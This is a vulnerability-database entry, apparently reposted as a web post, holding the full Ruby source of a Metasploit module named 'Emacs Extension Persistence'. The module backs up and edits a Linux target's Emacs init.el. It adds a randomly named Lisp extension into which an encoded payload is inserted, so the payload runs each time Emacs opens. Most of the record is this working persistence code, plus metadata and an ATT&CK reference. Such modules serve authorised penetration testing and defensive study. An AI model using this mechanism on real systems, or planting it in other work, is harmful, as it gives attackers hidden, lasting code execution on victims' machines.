{“lastseen”:”2026-02-18T19:28:02″,”description”:”This module adds a lisp based malicious extension to the emacs configuration file. When emacs is opened, the extension will be loaded and the payload will be executed. Tested against emacs 29.3 build 1 on Ubuntu Desktop 24.04. Module Options msf use…”,”published”:”2026-02-18T18:59:23″,”modified”:”2026-02-18T18:59:23″,”type”:”metasploit”,”title”:”Emacs Extension Persistence”,”source”:””,”references”:””,”id”:”MSF:EXPLOIT-LINUX-PERSISTENCE-EMACS_EXTENSION-“,”bulletinFamily”:”exploit”,”cwe”:null,”cvelist”:[],”sourceData”:”##\\n# This module requires Metasploit: https:\/\/metasploit.com\/download\\n# Current source: https:\/\/github.com\/rapid7\/metasploit-framework\\n##\\n\\nclass MetasploitModule \\u003c Msf::Exploit::Local\\n Rank = ExcellentRanking\\n\\n include Msf::Post::File\\n include Msf::Exploit::Local::Persistence\\n prepend Msf::Exploit::Remote::AutoCheck\\n\\n def initialize(info = {})\\n super(\\n update_info(\\n info,\\n ‘Name’ =\\u003e ‘Emacs Extension Persistence’,\\n ‘Description’ =\\u003e %q{\\n This module adds a lisp based malicious extension to the emacs configuration file.\\n When emacs is opened, the extension will be loaded and the payload will be executed.\\n\\n Tested against emacs 29.3 build 1 on Ubuntu Desktop 24.04.\\n },\\n ‘License’ =\\u003e MSF_LICENSE,\\n ‘Author’ =\\u003e [\\n ‘h00die’\\n ],\\n ‘Platform’ =\\u003e [ ‘linux’ ],\\n ‘Arch’ =\\u003e [ ARCH_CMD, ARCH_X86, ARCH_X64 ],\\n ‘SessionTypes’ =\\u003e [ ‘meterpreter’ ],\\n ‘Targets’ =\\u003e [[ ‘Auto’, {} ]],\\n ‘Privileged’ =\\u003e true,\\n ‘References’ =\\u003e [\\n # Leo Laporte [02:39:08]: Plus, as easy as it would be to write a malicious plugin for Emacs, I don’t think anybody’s going to do that. The pickings are slim, let’s put it that way.\\n [ ‘URL’, ‘https:\/\/twit.tv\/posts\/transcripts\/security-now-1061-transcript’],\\n [‘ATT\\u0026CK’, Mitre::Attack::Technique::T1546_EVENT_TRIGGERED_EXECUTION]\\n ],\\n ‘DisclosureDate’ =\\u003e ‘2026-01-28’,\\n ‘DefaultTarget’ =\\u003e 0,\\n ‘Notes’ =\\u003e {\\n ‘Stability’ =\\u003e [CRASH_SAFE],\\n ‘Reliability’ =\\u003e [REPEATABLE_SESSION],\\n ‘SideEffects’ =\\u003e [ARTIFACTS_ON_DISK, CONFIG_CHANGES, IOC_IN_LOGS]\\n }\\n )\\n )\\n register_advanced_options [\\n OptString.new(‘NAME’, [ false, ‘Name of the extension. Defaults to random’, ” ]),\\n OptString.new(‘CONFIG_FILE’, [ false, ‘Config file location on target. Defaults to ~\/init.el’, ” ]),\\n ]\\n\\n deregister_options(‘WritableDir’)\\n end\\n\\n def check\\n return CheckCode::Safe(’emacs is required’) unless command_exists?(’emacs’)\\n\\n CheckCode::Detected(’emacs is installed’)\\n end\\n\\n def plugin_name\\n return datastore[‘NAME’] unless datastore[‘NAME’].empty?\\n\\n Rex::Text.rand_text_alpha(5..10)\\n end\\n\\n def get_home\\n return cmd_exec(‘echo ~’).strip\\n end\\n\\n def install_persistence\\n p_name = plugin_name\\n vprint_status(\\”Using plugin name: #{p_name}\\”)\\n emacs_dir = \\”#{get_home}\/.emacs.d\\”\\n config_file = datastore[‘CONFIG_FILE’].empty? ? \\”#{emacs_dir}\/init.el\\” : datastore[‘CONFIG_FILE’]\\n lisp_dir = \\”#{emacs_dir}\/lisp\\”\\n extension_file = \\”#{lisp_dir}\/#{p_name}.el\\”\\n\\n if file?(config_file)\\n config_contents = read_file(config_file)\\n path = store_loot(‘init.el’, ‘text\/x-common-lisp’, session, config_contents, nil, nil)\\n print_good(\\”Original config file saved in: #{path}\\”)\\n @clean_up_rc \\u003c\\u003c \\”upload #{path} #{config_file}\\\\n\\”\\n else\\n print_status(\\”#{config_file} does not exist, creating it\\”)\\n cmd_exec(\\”mkdir #{emacs_dir}\\”) unless directory?(emacs_dir) # don’t use mkdir since that auto deletes on module finish\\n write_file(config_file, ”)\\n @clean_up_rc \\u003c\\u003c \\”rm #{config_file}\\\\n\\”\\n end\\n\\n unless directory?(lisp_dir)\\n cmd_exec(\\”mkdir #{lisp_dir}\\”)\\n @clean_up_rc \\u003c\\u003c \\”rmdir #{lisp_dir}\\\\n\\”\\n end\\n\\n fail_with(Failure::UnexpectedReply, \\”Unable to append to extension to #{config_file}\\”) unless append_file(config_file, \\”\\\\n(add-to-list ‘load-path \\\\\\”#{lisp_dir}\\\\\\”)\\\\n(require ‘#{p_name})\\\\n\\”)\\n\\n emacs_extension = File.read(File.join(\\n Msf::Config.data_directory, ‘exploits’, ’emacs_extension’, ‘template.el’\\n ))\\n emacs_extension = emacs_extension.gsub(‘PAYLOAD_PLACEHOLDER’, payload.encoded)\\n\\n emacs_extension = emacs_extension.gsub(‘PLUGIN_NAME’, p_name)\\n fail_with(Failure::UnexpectedReply, \\”Unable to write extension #{extension_file}\\”) unless write_file(extension_file, emacs_extension)\\n @clean_up_rc \\u003c\\u003c \\”rm #{extension_file}\\\\n\\”\\n end\\nend\\n”,”sourceHref”:”https:\/\/github.com\/rapid7\/metasploit-framework\/blob\/master\/modules\/exploits\/linux\/persistence\/emacs_extension.rb”,”cvss”:{“score”:0,”severity”:”NONE”,”vector”:”NONE”,”version”:”NONE”},”cvss2″:{},”cvss3″:{“version”:””,”vectorString”:””,”baseScore”:0,”baseSeverity”:””,”attackVector”:””,”attackComplexity”:””,”privilegesRequired”:””,”userInteraction”:””,”scope”:””,”confidentialityImpact”:””,”integrityImpact”:””,”availabilityImpact”:””,”cvssV3″:{“version”:””,”vectorString”:””,”baseScore”:0,”baseSeverity”:””,”attackVector”:””,”attackComplexity”:””,”privilegesRequired”:””,”userInteraction”:””,”scope”:””,”confidentialityImpact”:””,”integrityImpact”:””,”availabilityImpact”:””}},”href”:”https:\/\/www.rapid7.com\/db\/modules\/exploit\/linux\/persistence\/emacs_extension\/”,”category_name”:”Exploit”,”post_link”:””,”product”:””,”version”:””,”vendor”:””,”ai_description”:””,”ai_severity”:””,”ai_vendor”:””,”ai_product”:””,”ai_version”:””,”ai_score”:0}<\/p>\n","protected":false},"excerpt":{"rendered":"
{“lastseen”:”2026-02-18T19:28:02″,”description”:”This module adds a lisp based malicious extension to the emacs configuration file. When emacs is opened, the extension will be loaded and the payload…<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[3],"tags":[6,8,12,169,13,33,7,11,5],"class_list":["post-41426","post","type-post","status-publish","format-standard","hentry","category-category_exploit","tag-cve","tag-cvss","tag-exploit","tag-metasploit","tag-news","tag-none","tag-security","tag-tapic","tag-vulnerability"],"yoast_head":"\n